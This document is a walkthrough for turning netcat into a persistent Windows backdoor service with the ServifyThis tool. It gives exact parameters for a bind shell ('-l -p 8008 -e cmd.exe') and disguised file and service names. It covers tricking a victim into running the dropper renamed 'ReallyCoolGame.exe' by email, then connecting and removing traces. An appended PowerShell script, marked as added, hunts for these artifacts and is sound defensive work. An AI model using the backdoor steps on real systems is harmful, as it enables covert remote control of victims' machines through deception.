Launch ServifyThis.exe
The parameters are broken into two groups: local parameters, which apply to the machine where ServifyThis is being run, and remote parameters, which apply to the target machine where the "servified" executable will be installed.
Locally, we want to choose our copy of the netcat executable:
Application to "servify": c:\program files\attack tools\nc.exe
Remotely, we want to set netcat up to work like this:
Application Pathname: c:\windows\win32svc.exe
Command Parameters: -l -p 8008 -e c:\windows\system32\cmd.exe
Working Directory: c:\
Service Display Name: W32CriticalService
Service Pathname: c:\windows\system32\w32critsvc.exe
Additionally, we need to make sure that the "Respawn" checkbox is checked, as it is by default; with it set, the service relaunches the application whenever the application exits. Finally, let's set our respawn interval to 1 sec.
Once we click on the "OK" button, ServifyThis spits out a new executable called "Servified.exe" in the current directory.
We then arrange for "Servified.exe" to be run on our target machine, for instance by renaming it to something like "ReallyCoolGame.exe" and emailing it to the machine's user.
When Servified.exe is run on the target machine, it'll drop a copy of nc.exe into the c:\windows directory under the name win32svc.exe. It will also drop a new service binary (c:\windows\system32\w32critsvc.exe), install it as a service, and start it. The sole purpose of this service is to launch the copy of nc.exe (now called c:\windows\win32svc.exe) with the parameters specified: -l -p 8008 tells netcat to listen on TCP port 8008, and -e c:\windows\system32\cmd.exe tells it to hand a command shell to whoever connects to that port.
With that work done, Servified.exe will simply disappear, deleting itself.
We then use a local copy of netcat to connect up to our target, giving it the target's address and the listening port:
c:\Program Files\Attack Tools>nc <target> 8008
This will return us a command shell anchored in the c:\ directory, as that's what we specified for nc.exe's working directory.
We can do anything we want to do with that backdoor, confident in the knowledge that the service will relaunch nc within a second if the listener is killed, and that the service will autostart if the machine is rebooted.
Finally, once we've done our dirty work on the target machine, we can simply change to the c:\windows\system32 directory and issue the command:
c:\windows\system32>w32critsvc -u
which will stop the running service, stop the running instance of nc, and delete both the c:\windows\win32svc.exe file and the c:\windows\system32\w32critsvc.exe file.
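The walkthrough above leaves three artifacts on the target while the backdoor is in place: a service whose binary is not one a vendor shipped, a listening socket owned by a process launched from c:\windows, and a command line carrying netcat's "-e cmd.exe". The following PowerShell hunt, which is an added example and not part of the original walkthrough or of the ServifyThis tool, looks for each of these on a Windows host. The port list ($SuspectPorts) and the Authenticode check are assumptions of this example, chosen to match the 8008 listener described above; adjust them for your own environment.

```powershell
# Added example (not from the original walkthrough or from ServifyThis):
# hunt for the artifacts a "servified" netcat backdoor leaves behind.
# $SuspectPorts is a hypothetical list seeded with the port used above.
$SuspectPorts = @(8008)

# 1. Services whose binary is present but does not carry a valid
#    Authenticode signature. Service binaries dropped by ServifyThis
#    (w32critsvc.exe above) have no vendor signature, so they surface here.
function Get-UnsignedServices {
    Get-CimInstance Win32_Service | ForEach-Object {
        # Strip quotes and arguments to recover the executable path.
        $path = $_.PathName -replace '^"([^"]+)".*$', '$1' -replace '^(\S+\.exe).*$', '$1'
        if ($path -and (Test-Path -LiteralPath $path)) {
            $sig = Get-AuthenticodeSignature -FilePath $path
            if ($sig.Status -ne 'Valid') {
                [pscustomobject]@{
                    Name        = $_.Name
                    DisplayName = $_.DisplayName
                    Path        = $path
                    StartMode   = $_.StartMode
                    Signature   = $sig.Status
                }
            }
        }
    }
}

# 2. Listening TCP sockets on the suspect ports, with the owning process,
#    its image path and its command line. The nc listener from the
#    walkthrough shows up as c:\windows\win32svc.exe with "-l -p 8008 -e ...".
function Get-SuspectListeners {
    Get-NetTCPConnection -State Listen |
        Where-Object { $SuspectPorts -contains $_.LocalPort } |
        ForEach-Object {
            $proc = Get-CimInstance Win32_Process -Filter "ProcessId = $($_.OwningProcess)"
            [pscustomobject]@{
                LocalPort   = $_.LocalPort
                ProcessId   = $_.OwningProcess
                ParentId    = $proc.ParentProcessId
                Image       = $proc.ExecutablePath
                CommandLine = $proc.CommandLine
            }
        }
}

# 3. Any process whose command line carries netcat's "-e <shell>" pattern,
#    regardless of port or binary name. ParentProcessId points back at the
#    service that keeps respawning it.
function Get-NetcatShellProcesses {
    Get-CimInstance Win32_Process |
        Where-Object { $_.CommandLine -match '\s-e\s+\S*cmd\.exe' } |
        Select-Object ProcessId, ParentProcessId, ExecutablePath, CommandLine
}

Get-UnsignedServices      | Format-Table -AutoSize
Get-SuspectListeners      | Format-Table -AutoSize
Get-NetcatShellProcesses  | Format-Table -AutoSize
```

Run it from an elevated PowerShell session so that Win32_Process returns command lines for every user's processes. The third check is the most robust of the three: renaming the binaries and choosing a different port defeats the first two, but a netcat listener that hands out cmd.exe still has to say so on its command line, and killing it only produces a new copy a second later with a fresh process ID under the same parent.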